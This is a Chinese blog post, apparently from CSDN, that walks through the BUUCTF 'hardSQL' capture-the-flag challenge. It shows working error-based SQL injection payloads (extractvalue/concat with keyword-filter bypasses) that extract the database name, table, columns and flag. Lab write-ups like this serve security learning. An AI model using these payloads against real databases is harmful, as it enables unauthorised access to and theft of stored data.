[极客大挑战 2019]hardSQL

kuller_Yan

于 2020-10-14 23:32:10 发布

阅读量241

点赞数 1

分类专栏： CTF题目 # buu 文章标签： mysql ssl sql

版权声明：本文为博主原创文章，遵循 CC 4.0 BY-SA 版权协议，转载请附上原文出处链接和本声明。

本文链接：https://blog.csdn.net/kuller_Yan/article/details/109087952

版权

CTF题目同时被 2 个专栏收录

38 篇文章 1 订阅

订阅专栏

25 篇文章 0 订阅

订阅专栏

拿到题目直接模糊测试

发现过滤的挺多：什么and，union,=,都过滤掉了

然后看了下正常输入的页面回显之后尝试：报错注入

1'or(extractvalue(1,concat(0x7e,database())))#

得到库名：geek

'or(extractvalue(1,concat(0x7e,(select(table_name)from(information_schema.tables)where(table_schema)like("geek")))))#

得到：表名H4rDsq1；

'or(extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like("H4rDsq1")))))#

得到列名：id,username,password；

'or(extractvalue(1,concat(0x7e,(select(group_concat(password,20))from(H4rDsq1)where(id)like(1)))))#

得到一半的flag，然后修改payload

'or(extractvalue(1,concat(0x7e,(select(right(password,20))from(H4rDsq1)where(id)like(1)))))#

得到另一半

然后就是完整的flag了

关注

1
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
[极客大挑战 2019]hardSQL

拿到题目直接模糊测试发现过滤的挺多：什么and，union,=,都过滤掉了然后看了下正常输入的页面回显之后尝试：报错注入1'or(extractvalue(1,concat(0x7e,database())))#得到库名：geek'or(extractvalue(1,concat(0x7e,(select(table_name)from(information_schema.tables)where(table_schema)like("geek")))))#得到：表名H4rDsq1；'
复制链接

扫一扫

专栏目录

kuller_Yan CSDN认证博客专家 CSDN认证企业博客

码龄5年

61: 原创

8万+: 周排名

76万+: 总排名

3万+: 访问

: 等级

995: 积分

24: 粉丝

76: 获赞

11: 评论

88: 收藏

私信

关注

热门文章

分类专栏

编译原理 1篇
CTF题目 38篇
渗透测试 1篇
XSS挑战 1篇
sql-labs 1篇
buu 25篇
攻防世界 1篇
BugkuCTF-WEB 12篇
笔记 11篇
数据结构 6篇
PTA 1篇
noi 4篇

最新评论

数据结构：生日相同2.0（c++版本）
C++练习题解析: 给代码修改了一下[code=cpp] #include<iostream> #include<string.h> #include<algorithm> using namespace std; int cmp(struct stu x, struct stu y); struct stu{ char name[20]; int month; int day; int l; }stu[181]; int cmp(struct stu x, struct stu y) { x.l = strlen(x.name); y.l = strlen(y.name); if (x.month == y.month) { if (x.day == y.day) { if (x.l == y.l) { return strcmp(x.name, y.name) < 0; } return x.l < y.l; } return x.day < y.day; } return x.month < y.month; } int main() { int x[13][32], n, r = 0, d = 0; cin >> n; memset(x, 0, sizeof(x)); for (int i = 1; i < n; i++) { cin >> stu[i].name >> stu[i].month >> stu[i].day; x[stu[i].month][stu[i].day]++; } sort(stu, stu + n, cmp); //排序名字 for (int i = 1; i < 13; i++) { for (int j = 1; j < 32; j++) { if (x[i][j] > 0) //保证输出的时间是按照顺序来的， { d = 0; for (int k = 0; k < 0; k++) { if (stu[k].month == i && stu[k].day == j) { d++; } } if (d >= 2) //主要是为了确定 [/code]
数据结构：统计学生信息（c++动态链表完成）
m0_74953703: 太棒啦
数据结构：生日相同2.0（c++版本）
大山有了我好寂寞ᶘ ͡°ᴥ: 错的离谱，找厂子上班
数据结构：生日相同2.0（c++版本）
staygone: return 0；打错了兄台
2021-5-5 buu刷题记录
我爱人工智能: 干货满满，很详细，评论占个坑,期待大佬回访！

大家在看

最新文章

目录

评论

被折叠的条评论为什么被折叠?

到【灌水乐园】发言

查看更多评论

添加红包

成就一亿技术人!

hope_wisdom

发出的红包

实付元

使用余额支付

点击重新获取

扫码支付

钱包余额 0

抵扣说明：

1.余额是钱包充值的虚拟货币，按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载，可以购买VIP、付费专栏及课程。